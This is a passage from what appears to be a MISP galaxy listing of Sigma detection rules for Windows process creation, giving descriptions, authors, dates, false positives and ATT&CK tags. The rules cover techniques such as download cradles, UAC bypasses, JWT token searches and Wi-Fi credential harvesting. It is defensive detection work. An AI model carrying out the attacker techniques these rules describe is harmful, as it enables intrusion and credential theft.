Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

Internal MISP references

UUID fff9d2b7-e11c-4a69-93d3-40ef66189767 which can be used as unique global reference for Suspicious Copy From or To System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-07-03
falsepositive ['Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)', 'When cmd.exe and xcopy.exe are called directly', 'When the command contains the keywords but not in the correct order']
filename proc_creation_win_susp_copy_system_dir.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

MsiExec Web Install

Detects suspicious msiexec process starts with web addresses as parameter

Internal MISP references

UUID f7b5f842-a6af-4da5-9e95-e32478f3cd2f which can be used as unique global reference for MsiExec Web Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-02-09
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_msiexec_web_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.007', 'attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious GUP Usage

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

Internal MISP references

UUID 0a4f6091-223b-41f6-8743-f322ec84930b which can be used as unique global reference for Suspicious GUP Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-02-06
falsepositive ['Execution of tools named GUP.exe and located in folders different than Notepad++\updater']
filename proc_creation_win_gup_suspicious_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Security Privileges Enumeration Via Whoami.EXE

Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.

Internal MISP references

UUID 97a80ec7-0e2f-4d05-9ef4-65760e634f6b which can be used as unique global reference for Security Privileges Enumeration Via Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-05-05
falsepositive ['Unknown']
filename proc_creation_win_whoami_priv_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Potentially Suspicious JWT Token Search Via CLI

Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.

Internal MISP references

UUID 6d3a3952-6530-44a3-8554-cf17c116c615 which can be used as unique global reference for Potentially Suspicious JWT Token Search Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), kagebunsher
creation_date 2022-10-25
falsepositive ['Unknown']
filename proc_creation_win_susp_jwt_token_search.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1528', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.

Internal MISP references

UUID a58353df-af43-4753-bad0-cd83ef35eef5 which can be used as unique global reference for Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-14
falsepositive ['Legitimate usage to restore snapshots', 'Legitimate admin activity']
filename proc_creation_win_ntdsutil_susp_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Weak or Abused Passwords In CLI

Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline

Internal MISP references

UUID 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 which can be used as unique global reference for Weak or Abused Passwords In CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-14
falsepositive ['Legitimate usage of the passwords by users via commandline (should be discouraged)', 'Other currently unknown false positives']
filename proc_creation_win_susp_weak_or_abused_passwords.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution']

Suspicious PowerShell Download and Execute Pattern

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

Internal MISP references

UUID e6c54d94-498c-4562-a37c-b469d8e9a275 which can be used as unique global reference for Suspicious PowerShell Download and Execute Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-28
falsepositive ['Software installers that pull packages from remote systems and execute them']
filename proc_creation_win_powershell_susp_download_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Change Default File Association Via Assoc

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 which can be used as unique global reference for Change Default File Association Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019-10-21
falsepositive ['Admin activity']
filename proc_creation_win_cmd_assoc_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Execution With Image Extension

Detects the execution of Rundll32.exe with DLL files masquerading as image files

Internal MISP references

UUID 4aa6040b-3f28-44e3-a769-9208e5feb5ec which can be used as unique global reference for Suspicious Rundll32 Execution With Image Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023-03-13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_execution_with_image_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Potential Lateral Movement via Windows Remote Shell

Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.

Internal MISP references

UUID 79df3f68-dccb-48e9-9171-b75cbc37c51d which can be used as unique global reference for Potential Lateral Movement via Windows Remote Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Liran Ravich
creation_date 2025-10-22
falsepositive ['Legitimate use of WinRM within the organization']
filename proc_creation_win_winrshost_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Query Usage To Exfil Data

Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use

Internal MISP references

UUID 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 which can be used as unique global reference for Query Usage To Exfil Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-01
falsepositive ['Unknown']
filename proc_creation_win_query_session_exfil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

Internal MISP references

UUID 85b0b087-eddf-4a2b-b033-d771fa2b9775 which can be used as unique global reference for PowerShell Download and Execution Cradles in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-24
falsepositive ['Some PowerShell installers were seen using similar combinations. Apply filters accordingly']
filename proc_creation_win_powershell_download_iex.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Execution of Sysinternals Tools

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

Internal MISP references

UUID 7cccd811-7ae9-4ebe-9afd-cb5c406b824b which can be used as unique global reference for Potential Execution of Sysinternals Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017-08-28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same command line flag']
filename proc_creation_win_sysinternals_eula_accepted.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Suspicious WindowsTerminal Child Processes

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

Internal MISP references

UUID 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 which can be used as unique global reference for Suspicious WindowsTerminal Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-25
falsepositive ['Other legitimate "Windows Terminal" profiles']
filename proc_creation_win_windows_terminal_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence']

Service StartupType Change Via PowerShell Set-Service

Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"

Internal MISP references

UUID 62b20d44-1546-4e61-afce-8e175eb9473c which can be used as unique global reference for Service StartupType Change Via PowerShell Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-04
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_powershell_set_service_disabled.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Internal MISP references

UUID 584bca0f-3608-4402-80fd-4075ff6072e3 which can be used as unique global reference for Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems), Josh Nickels
creation_date 2024-09-02
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_unicode_img.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Download from Office Domain

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

Internal MISP references

UUID 00d49ed5-4491-4271-a8db-650a4ef6f8c1 which can be used as unique global reference for Suspicious Download from Office Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-12-27
falsepositive ['Scripts or tools that download attachments from these domains (OneNote, Outlook 365)']
filename proc_creation_win_susp_download_office_domain.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.resource-development', 'attack.t1105', 'attack.t1608']
Related clusters

To see the related clusters, click here.

Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

Internal MISP references

UUID 5f03babb-12db-4eec-8c82-7b4cb5580868 which can be used as unique global reference for Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-22
falsepositive ['The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.']
filename proc_creation_win_odbcconf_response_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Service Started/Stopped Via Wmic.EXE

Detects usage of wmic to start or stop a service

Internal MISP references

UUID 0b7163dc-7eee-4960-af17-c0cd517f92da which can be used as unique global reference for Service Started/Stopped Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-20
falsepositive ['Unknown']
filename proc_creation_win_wmic_service_manipulation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

PowerShell Execution With Potential Decryption Capabilities

Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.

Internal MISP references

UUID 434c08ba-8406-4d15-8b24-782cb071a691 which can be used as unique global reference for PowerShell Execution With Potential Decryption Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-30
falsepositive ['Unlikely']
filename proc_creation_win_powershell_decrypt_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

HackTool - TruffleSnout Execution

Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.

Internal MISP references

UUID 69ca006d-b9a9-47f5-80ff-ecd4d25d481a which can be used as unique global reference for HackTool - TruffleSnout Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-20
falsepositive ['Unknown']
filename proc_creation_win_hktl_trufflesnout.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

UAC Bypass Tools Using ComputerDefaults

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

Internal MISP references

UUID 3c05e90d-7eba-4324-9972-5d7f711a60a8 which can be used as unique global reference for UAC Bypass Tools Using ComputerDefaults in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-31
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_computerdefaults.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution

Detects potentially suspicious child processes launched via the ScreenConnect client service.

Internal MISP references

UUID 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale
creation_date 2022-02-25
falsepositive ['If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.']
filename proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

PowerShell Set-Acl On Windows Folder

Detects PowerShell scripts to set the ACL to a file in the Windows folder

Internal MISP references

UUID 0944e002-e3f6-4eb5-bf69-3a3067b53d73 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-18
falsepositive ['Unknown']
filename proc_creation_win_powershell_set_acl_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Execute Code with Pester.bat as Parent

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Internal MISP references

UUID 18988e1b-9087-4f8a-82fe-0414dce49878 which can be used as unique global reference for Execute Code with Pester.bat as Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022-08-20
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Scheduled Task Creation Masquerading as System Processes

Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.

Internal MISP references

UUID 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab which can be used as unique global reference for Scheduled Task Creation Masquerading as System Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-02-05
falsepositive ['Legitimate system administration tasks scheduling trusted system processes.']
filename proc_creation_win_schtasks_system_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.defense-evasion', 'attack.t1036.004', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Non-privileged Usage of Reg or Powershell

Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry

Internal MISP references

UUID 8f02c935-effe-45b3-8fc9-ef8696a9e41d which can be used as unique global reference for Non-privileged Usage of Reg or Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
creation_date 2020-10-05
falsepositive ['Unknown']
filename proc_creation_win_susp_non_priv_reg_or_ps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

PowerShell MSI Install via WindowsInstaller COM From Remote Location

Detects the execution of PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer) hosted remotely. This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.

Internal MISP references

UUID 222720a7-047f-4054-baa5-bab9be757db0 which can be used as unique global reference for PowerShell MSI Install via WindowsInstaller COM From Remote Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Meroujan Antonyan (vx3r)
creation_date 2025-06-05
falsepositive ['Unknown']
filename proc_creation_win_powershell_comobject_msi_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1218', 'attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Powershell Inline Execution From A File

Detects inline execution of PowerShell code from a file

Internal MISP references

UUID ee218c12-627a-4d27-9e30-d6fb2fe22ed2 which can be used as unique global reference for Powershell Inline Execution From A File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-25
falsepositive ['Unknown']
filename proc_creation_win_powershell_exec_data_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Non Interactive PowerShell Process Spawned

Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.

Internal MISP references

UUID f4bbd493-b796-416e-bbf2-121235348529 which can be used as unique global reference for Non Interactive PowerShell Process Spawned in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
creation_date 2019-09-12
falsepositive ['Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies']
filename proc_creation_win_powershell_non_interactive_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Nltest.EXE Execution

Detects nltest commands that can be used for information discovery

Internal MISP references

UUID 903076ff-f442-475a-b667-4f246bcc203b which can be used as unique global reference for Nltest.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Arun Chauhan
creation_date 2023-02-03
falsepositive ['Legitimate administration activity']
filename proc_creation_win_nltest_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016', 'attack.t1018', 'attack.t1482']
Related clusters

To see the related clusters, click here.

New User Created Via Net.EXE

Identifies the creation of local users via the net.exe command.

Internal MISP references

UUID cd219ff3-fa99-45d4-8380-a7d15116c6dc which can be used as unique global reference for New User Created Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (adapted to Sigma for oscd.community)
creation_date 2018-10-30
falsepositive ['Legitimate user creation.', 'Better use event IDs for user creation rather than command line rules.']
filename proc_creation_win_net_user_add.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Program Executed Using Proxy/Local Command Via SSH.EXE

Detect usage of the "ssh.exe" binary as a proxy to launch other programs.

Internal MISP references

UUID 7d6d30b8-5b91-4b90-a891-46cccaf29598 which can be used as unique global reference for Program Executed Using Proxy/Local Command Via SSH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022-12-29
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_ssh_proxy_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

File Download Via Bitsadmin To An Uncommon Target Folder

Detects usage of bitsadmin downloading a file to uncommon target folder

Internal MISP references

UUID 6e30c82f-a9f8-4aab-b79c-7c12bce6f248 which can be used as unique global reference for File Download Via Bitsadmin To An Uncommon Target Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Exchange PowerShell Snap-Ins Usage

Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27

Internal MISP references

UUID 25676e10-2121-446e-80a4-71ff8506af47 which can be used as unique global reference for Exchange PowerShell Snap-Ins Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-03-03
falsepositive ['Unknown']
filename proc_creation_win_powershell_snapins_hafnium.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.collection', 'attack.t1114']
Related clusters

To see the related clusters, click here.

Harvesting Of Wifi Credentials Via Netsh.EXE

Detect the harvesting of wifi credentials using netsh.exe

Internal MISP references

UUID 42b1a5b8-353f-4f10-b256-39de4467faff which can be used as unique global reference for Harvesting Of Wifi Credentials Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), oscd.community
creation_date 2020-04-20
falsepositive ['Unknown']
filename proc_creation_win_netsh_wifi_credential_harvesting.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential-access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

HackTool - KrbRelay Execution

Detects the use of KrbRelay, a Kerberos relaying tool

Internal MISP references

UUID e96253b8-6b3b-4f90-9e59-3b24b99cf9b4 which can be used as unique global reference for HackTool - KrbRelay Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-04-27
falsepositive ['Unlikely']
filename proc_creation_win_hktl_krbrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

UAC Bypass Using PkgMgr and DISM

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

Internal MISP references

UUID a743ceba-c771-4d75-97eb-8a90f7f4844c which can be used as unique global reference for UAC Bypass Using PkgMgr and DISM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_pkgmgr_dism.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

Internal MISP references

UUID aa6f6ea6-0676-40dd-b510-6e46f02d8867 which can be used as unique global reference for Local File Read Using Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-27
falsepositive ['Unknown']
filename proc_creation_win_curl_local_file_read.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.

Internal MISP references

UUID 9212f354-7775-4e28-9c9f-8f0a4544e664 which can be used as unique global reference for Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-14
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_adexplorer_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Powershell Token Obfuscation - Process Creation

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Internal MISP references

UUID deb9b646-a508-44ee-b7c9-d8965921c6b6 which can be used as unique global reference for Powershell Token Obfuscation - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-27
falsepositive ['Unknown']
filename proc_creation_win_powershell_token_obfuscation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027.009']
Related clusters

To see the related clusters, click here.

Disable Important Scheduled Task

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 9ac94dc8-9042-493c-ba45-3b5e7c86b980 which can be used as unique global reference for Disable Important Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
creation_date 2021-12-26
falsepositive ['Unknown']
filename proc_creation_win_schtasks_disable.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

New Service Creation Using PowerShell

Detects the creation of a new service using powershell.

Internal MISP references

UUID c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 which can be used as unique global reference for New Service Creation Using PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2023-02-20
falsepositive ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation']
filename proc_creation_win_powershell_create_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Logon Scripts - CommandLine

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

Internal MISP references

UUID 21d856f9-9281-4ded-9377-51a1a6e2a432 which can be used as unique global reference for Potential Persistence Via Logon Scripts - CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019-01-12
falsepositive ['Legitimate addition of Logon Scripts via the command line by administrators or third party tools']
filename proc_creation_win_registry_logon_script.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1037.001']
Related clusters

To see the related clusters, click here.

Suspicious NTLM Authentication on the Printer Spooler Service

Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service

Internal MISP references

UUID bb76d96b-821c-47cf-944b-7ce377864492 which can be used as unique global reference for Suspicious NTLM Authentication on the Printer Spooler Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic (idea), Tobias Michalski (Nextron Systems)
creation_date 2022-05-04
falsepositive ['Unknown']
filename proc_creation_win_rundll32_ntlmrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.credential-access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin

